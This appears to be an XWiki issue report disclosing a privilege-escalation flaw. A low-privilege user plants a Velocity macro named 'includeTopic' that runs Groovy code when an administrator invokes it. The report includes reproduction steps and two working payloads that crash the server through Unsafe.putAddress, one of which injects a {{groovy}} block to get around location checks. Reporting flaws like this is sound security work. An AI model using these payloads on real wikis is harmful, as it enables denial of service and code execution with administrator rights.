Major Description
This is a particular pain because I don't see an easy fix at the moment.
This was alluded to in XWIKI-4934 but I wanted it listed here so it's not lost.
To repeat:
1. create a user with no privileges.
2. log in as this user and write the following in his user page (edit in wiki mode)
{{velocity}}
#macro(includeTopic, $unused)
#set($script = 'public static crash() {new Random().unsafe.putAddress(0,0);}')
#set($obj = $xcontext.getContext().getWiki().parseGroovyFromString($script, $xcontext.getContext()))
$obj.crash()
#end
{{/velocity}}
3. As an administrator try to invoke an includeTopic macro
4. segfault.
A variation on this is to write a macro which outputs code that will then run. This variation is immune to attempts to test where the macro resides because the macro does nothing requiring privileges, it only outputs code which is then parsed in the privileged page.
{{velocity}}
#macro(includeTopic, $unused)
#set($dsqb = '{{')
${dsqb}groovy}} new Random().unsafe.putAddress(0,0); ${dsqb}/groovy}}
#end
{{/velocity}}